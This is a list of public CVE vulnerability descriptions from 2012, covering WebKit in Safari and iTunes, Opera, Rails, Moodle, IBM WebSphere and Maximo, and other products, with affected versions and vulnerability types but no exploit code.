[CVE-2012-3659] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3658] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3657] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3656] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3655] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3654] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3653] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3652] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3651] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3650] WebKit in Apple Safari before 6.0 accesses uninitialized memory locations during the rendering of SVG images, which allows remote attackers to obtain sensitive information from process memory via a crafted web site.
[CVE-2012-3649] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3648] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3647] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3646] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3645] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3644] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3643] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3642] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3641] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3640] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3639] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3638] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3637] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3636] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3635] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3634] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3633] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3632] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3631] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3630] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3629] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3628] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3627] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3626] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3625] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3624] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3623] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3622] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3621] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3620] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3618] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3617] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3616] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3615] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3614] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3613] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3612] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3611] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3610] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3609] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3608] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3607] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3606] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3605] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3604] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3603] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3602] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3601] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3600] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3599] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3598] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3597] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3596] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3595] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3594] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3593] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3592] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3591] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3590] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3589] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3568] Opera before 12.00 Beta allows remote attackers to cause a denial of service (application crash) via crafted WebGL content, as demonstrated by a codeflow.org WebGL demo.
[CVE-2012-3563] Opera before 12.00 Beta allows remote attackers to cause a denial of service (application crash) via a web page that contains invalid character encodings.
[CVE-2012-3562] Opera before 12.00 Beta allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted web page that is not properly handled during a reload, as demonstrated by a "multiple origin camera test" page.
[CVE-2012-3560] Opera before 11.65 does not ensure that the address field corresponds to the displayed web page during blocked navigation, which makes it easier for remote attackers to conduct spoofing attacks by detecting and preventing attempts to load a different web page.
[CVE-2012-3558] Opera before 11.65 does not ensure that the address field corresponds to the displayed web page during unusually timed changes to this field, which makes it easier for user-assisted remote attackers to conduct spoofing attacks via vectors involving navigation, reloads, and redirects.
[CVE-2012-3557] Opera before 11.65 does not properly restrict the reading of JSON strings, which allows remote attackers to perform cross-domain loading of JSON resources and consequently obtain sensitive information via a crafted web site.
[CVE-2012-3556] Opera before 11.65 does not properly restrict the opening of a pop-up window in response to the first click of a double-click action, which makes it easier for user-assisted remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary code via a crafted web site.
[CVE-2012-3555] Opera before 11.65 does not ensure that keyboard sequences are associated with a visible window, which makes it easier for user-assisted remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary code via a crafted web site, related to a "hidden keyboard navigation" issue.
[CVE-2012-3551] Cross-site scripting (XSS) vulnerability in crowbar_framework/app/views/support/index.html.haml in the Crowbar barclamp in Crowbar, possibly 1.4 and earlier, allows remote attackers to inject arbitrary web script or HTML via the file parameter to /utils.
[CVE-2012-3540] Open redirect vulnerability in views/auth_forms.py in OpenStack Dashboard (Horizon) Essex (2012.1) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the next parameter to auth/login/. NOTE: this issue was originally assigned CVE-2012-3542 by mistake.
[CVE-2012-3531] Cross-site scripting (XSS) vulnerability in the Install Tool in TYPO3 4.5.x before 4.5.19, 4.6.x before 4.6.12 and 4.7.x before 4.7.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-3528] Multiple cross-site scripting (XSS) vulnerabilities in the backend in TYPO3 4.5.x before 4.5.19, 4.6.x before 4.6.12 and 4.7.x before 4.7.4 allow remote authenticated backend users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-3508] Cross-site scripting (XSS) vulnerability in program/lib/washtml.php in Roundcube Webmail 0.8.0 allows remote attackers to inject arbitrary web script or HTML by using "javascript:" in an href attribute in the body of an HTML-formatted email.
[CVE-2012-3507] Cross-site scripting (XSS) vulnerability in program/steps/mail/func.inc in RoundCube Webmail before 0.8.0, when using the Larry skin, allows remote attackers to inject arbitrary web script or HTML via the email message subject.
[CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
[CVE-2012-3476] Multiple cross-site scripting (XSS) vulnerabilities in (1) application/views/admin/layout.php and (2) themes/default/views/header.php in the Ushahidi Platform before 2.5 allow remote authenticated users to inject arbitrary web script or HTML via vectors related to a site name.
[CVE-2012-3465] Cross-site scripting (XSS) vulnerability in actionpack/lib/action_view/helpers/sanitize_helper.rb in the strip_tags helper in Ruby on Rails before 3.0.17, 3.1.x before 3.1.8, and 3.2.x before 3.2.8 allows remote attackers to inject arbitrary web script or HTML via malformed HTML markup.
[CVE-2012-3464] Cross-site scripting (XSS) vulnerability in activesupport/lib/active_support/core_ext/string/output_safety.rb in Ruby on Rails before 3.0.17, 3.1.x before 3.1.8, and 3.2.x before 3.2.8 might allow remote attackers to inject arbitrary web script or HTML via vectors involving a ' (quote) character.
[CVE-2012-3463] Cross-site scripting (XSS) vulnerability in actionpack/lib/action_view/helpers/form_tag_helper.rb in Ruby on Rails 3.x before 3.0.17, 3.1.x before 3.1.8, and 3.2.x before 3.2.8 allows remote attackers to inject arbitrary web script or HTML via the prompt field to the select_tag helper.
[CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
[CVE-2012-3448] Unspecified vulnerability in Ganglia Web before 3.5.1 allows remote attackers to execute arbitrary PHP code via unknown attack vectors.
[CVE-2012-3434] Multiple cross-site scripting (XSS) vulnerabilities in userperspan.php in the Count Per Day module before 3.2 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) page, (2) datemin, or (3) datemax parameter.
[CVE-2012-3423] The IcedTea-Web plugin before 1.2.1 does not properly handle NPVariant NPStrings without NUL terminators, which allows remote attackers to cause a denial of service (crash), obtain sensitive information from memory, or execute arbitrary code via a crafted Java applet.
[CVE-2012-3422] The getFirstInTableInstance function in the IcedTea-Web plugin before 1.2.1 returns an uninitialized pointer when the instance_to_id_map hash is empty, which allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted web page, which causes an uninitialized memory location to be read.
[CVE-2012-3413] The HTMLQuoteColorer::process function in messageviewer/htmlquotecolorer.cpp in KDE PIM 4.6 through 4.8 does not disable JavaScript, Java, and Plugins, which allows remote attackers to inject arbitrary web script or HTML via a crafted email.
[CVE-2012-3411] Dnsmasq before 2.63test1, when used with certain libvirt configurations, replies to requests from prohibited interfaces, which allows remote attackers to cause a denial of service (traffic amplification) via a spoofed DNS query.
[CVE-2012-3396] Cross-site scripting (XSS) vulnerability in cohort/edit_form.php in Moodle 2.0.x before 2.0.10, 2.1.x before 2.1.7, 2.2.x before 2.2.4, and 2.3.x before 2.3.1 allows remote authenticated administrators to inject arbitrary web script or HTML via the idnumber field. NOTE: this vulnerability exists because of an incorrect fix for CVE-2012-2365.
[CVE-2012-3393] Cross-site scripting (XSS) vulnerability in repository/lib.php in Moodle 2.1.x before 2.1.7 and 2.2.x before 2.2.4 allows remote authenticated administrators to inject arbitrary web script or HTML by renaming a repository.
[CVE-2012-3389] Multiple cross-site scripting (XSS) vulnerabilities in mod/lti/typessettings.php in Moodle 2.2.x before 2.2.4 and 2.3.x before 2.3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) lti_typename or (2) lti_toolurl parameter.
[CVE-2012-3382] Cross-site scripting (XSS) vulnerability in the ProcessRequest function in mcs/class/System.Web/System.Web/HttpForbiddenHandler.cs in Mono 2.10.8 and earlier allows remote attackers to inject arbitrary web script or HTML via a file with a crafted name and a forbidden extension, which is not properly handled in an error message.
[CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
[CVE-2012-3370] The SecurityAssociation.getCredential method in JBoss Enterprise Application Platform (EAP) 5.2.0, Web Platform (EWP) 5.2.0, and BRMS Platform before 5.3.1 returns the credentials of the previous user when a security context is not provided, which allows remote attackers to gain privileges as other users.
[CVE-2012-3369] The CallerIdentityLoginModule in JBoss Enterprise Application Platform (EAP) 5.2.0, Web Platform (EWP) 5.2.0, and BRMS Platform before 5.3.1 allows remote attackers to gain privileges of the previous user via a null password, which causes the previous user's password to be used.
[CVE-2012-3364] Multiple stack-based buffer overflows in the Near Field Communication Controller Interface (NCI) in the Linux kernel before 3.4.5 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via incoming frames with crafted length fields.
[CVE-2012-3350] SQL injection vulnerability in index.php in Webmatic 3.1.1 allows remote attackers to execute arbitrary SQL commands via the Referer HTTP header.
[CVE-2012-3343] Cross-site request forgery (CSRF) vulnerability in Microdasys before 3.5.1-B708, as used in Bloxx Web Filtering before 5.0.14 and other products, allows remote attackers to hijack the authentication of arbitrary users for requests that trigger error pages containing XSS sequences, a different vulnerability than CVE-2012-2564.
[CVE-2012-3330] The proxy server in IBM WebSphere Application Server 7.0 before 7.0.0.27, 8.0 before 8.0.0.5, and 8.5 before 8.5.0.1, and WebSphere Virtual Enterprise, allows remote attackers to cause a denial of service (daemon outage) via a crafted request.
[CVE-2012-3328] Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management 7.1, Maximo Asset Management Essentials 7.1, Tivoli Asset Management for IT 7.1 and 7.2, Tivoli Service Request Manager 7.1 and 7.2, and Change and Configuration Management Database (CCMDB) 7.1 and 7.2 allows remote attackers to inject arbitrary web script or HTML via vectors related to a hidden frame footer.
[CVE-2012-3327] Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management 6.2 through 7.5, Maximo Asset Management Essentials 6.2 through 7.5, Tivoli Asset Management for IT 6.2 through 7.2, Tivoli Service Request Manager 7.1 and 7.2, Maximo Service Desk 6.2, Change and Configuration Management Database (CCMDB) 7.1 and 7.2, and SmartCloud Control Desk 7.5 allows remote attackers to inject arbitrary web script or HTML via vectors related to a login action.
[CVE-2012-3326] Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management 7.5, as used in SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Maximo Service Desk, and Change and Configuration Management Database (CCMDB), allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-3325] IBM WebSphere Application Server (WAS) 6.1.x before 6.1.0.45, 7.0.x before 7.0.0.25, 8.0.x before 8.0.0.5, and 8.5.x Full Profile before 8.5.0.1, when the PM44303 fix is installed, does not properly validate credentials, which allows remote authenticated users to obtain administrative access via unspecified vectors.
[CVE-2012-3322] Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management 6.2 through 7.5, Maximo Asset Management Essentials 6.2 through 7.5, Tivoli Asset Management for IT 6.2 through 7.2, Tivoli Service Request Manager 7.1 and 7.2, Maximo Service Desk 6.2, Change and Configuration Management Database (CCMDB) 7.1 and 7.2, and SmartCloud Control Desk 7.5 allows remote authenticated users to inject arbitrary web script or HTML via vectors related to a display name.
[CVE-2012-3319] IBM Rational Business Developer 8.x before 8.0.1.4 allows remote attackers to obtain potentially sensitive information via a connection to a web service created with the Rational Business Developer product.
[CVE-2012-3317] IBM WebSphere Message Broker 6.1 before 6.1.0.11, 7.0 before 7.0.0.5, and 8.0 before 8.0.0.2 has incorrect ownership of certain uninstaller Java Runtime Environment (JRE) files, which might allow local users to gain privileges by leveraging access to uid 501 or gid 300.
[CVE-2012-3316] Cross-site scripting (XSS) vulnerability in the Tivoli Process Automation Engine (TPAE) in IBM Maximo Asset Management 6.2 through 7.5, Maximo Asset Management Essentials 6.2 through 7.5, Tivoli Asset Management for IT 6.2 through 7.2, Tivoli Service Request Manager 7.1 and 7.2, Maximo Service Desk 6.2, Change and Configuration Management Database (CCMDB) 7.1 and 7.2, and SmartCloud Control Desk 7.5 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-3315] The Java servlets in the management console in IBM Tivoli Federated Identity Manager (TFIM) through 6.2.2 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) before 6.2.2 do not require authentication for all resource downloads, which allows remote attackers to bypass intended J2EE security constraints, and obtain sensitive information related to (1) federation metadata or (2) a web plugin configuration template, via a crafted request.
[CVE-2012-3313] Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management 6.2 through 7.5, as used in SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Maximo Service Desk, and Change and Configuration Management Database (CCMDB), allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-3311] IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.45, 7.0 before 7.0.0.25, 8.0 before 8.0.0.5, and 8.5 before 8.5.0.1 on z/OS, in certain configurations involving Federated Repositories for IIOP connections and Optimized Local Adapters, does not perform CBIND checks, which allows local users to bypass intended access restrictions, and read or modify application data, via unspecified vectors.
[CVE-2012-3308] Cross-site scripting (XSS) vulnerability in IBM Sametime 8.0.2 through 8.5.2.1 allows remote attackers to inject arbitrary web script or HTML via an IM chat.
[CVE-2012-3306] IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.45, 7.0 before 7.0.0.25, 8.0 before 8.0.0.5, and 8.5 before 8.5.0.1, when multi-domain support is configured, does not purge password data from the authentication cache, which has unspecified impact and remote attack vectors.
[CVE-2012-3305] Directory traversal vulnerability in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before 7.0.0.25, 8.0 before 8.0.0.5, and 8.5 before 8.5.0.1 allows remote attackers to overwrite arbitrary files via a crafted application file.
[CVE-2012-3304] The Administrative Console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.45, 7.0 before 7.0.0.25, 8.0 before 8.0.0.5, and 8.5 before 8.5.0.1 allows remote attackers to hijack sessions via unspecified vectors.
[CVE-2012-3302] Multiple cross-site scripting (XSS) vulnerabilities in IBM Lotus Domino 7.x and 8.x before 8.5.4 allow remote attackers to inject arbitrary web script or HTML via (1) a URL accessed during use of the Mail template in the WebMail UI or (2) a URL accessed during use of Domino Help through the Domino HTTP server.
[CVE-2012-3300] IBM WebSphere Commerce 7.0 before 7.0.0.6, when persistent sessions and personalization IDs are enabled, allows remote attackers to cause a denial of service (resource consumption) via unspecified vectors.
[CVE-2012-3298] Unspecified vulnerability in the REST services framework in IBM WebSphere Commerce 7.0 Feature Pack 4 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unspecified vectors.
[CVE-2012-3297] Cross-site scripting (XSS) vulnerability in the embedded HTTP server in the Service Console in IBM Tivoli Monitoring 6.2.2 before 6.2.2-TIV-ITM-FP0009 and 6.3.2 before 6.2.3-TIV-ITM-FP0001 allows remote attackers to inject arbitrary web script or HTML via a crafted URI.
[CVE-2012-3296] Cross-site scripting (XSS) vulnerability in the Help link in the login panel in IBM Power Hardware Management Console (HMC) 7R7.1.0 before SP4, 7R7.2.0 before SP2, and 7R7.3.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-3295] IBM WebSphere MQ 7.1, when an SVRCONN channel is used, allows remote attackers to bypass the security-configuration setup step and obtain queue-manager access via unspecified vectors.
